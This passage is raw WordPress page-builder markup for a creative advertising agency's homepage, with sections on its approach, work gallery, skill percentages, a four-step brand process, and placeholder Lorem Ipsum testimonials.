custom_padding_phone=\"0px||||false|false\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Why-we.png\" alt=\"Why We creative agency\" title_text=\"Why we\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"61px|||||\" custom_margin_tablet=\"\" custom_margin_phone=\"0px||||false|false\" custom_margin_last_edited=\"on|phone\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"|auto|2px|auto||\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-04.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"0px||50px||false|false\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"4.4.9\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.1\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>We have a dedicated team to build new tools and technique, to complete the day today repetitive work with precision.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Lead/Sales Generation Campaign - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Digital Advertising - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"4.5.2\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Artboard-4.png\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Artboard-Copy-12.png\" alt=\"digital advertising\" title_text=\"digital advertising\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px||3px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just four steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px|4px|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px||||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-4.jpg\" alt=\"marketing strategy\" title_text=\"marketing strategy\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"50px||50px|||\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" 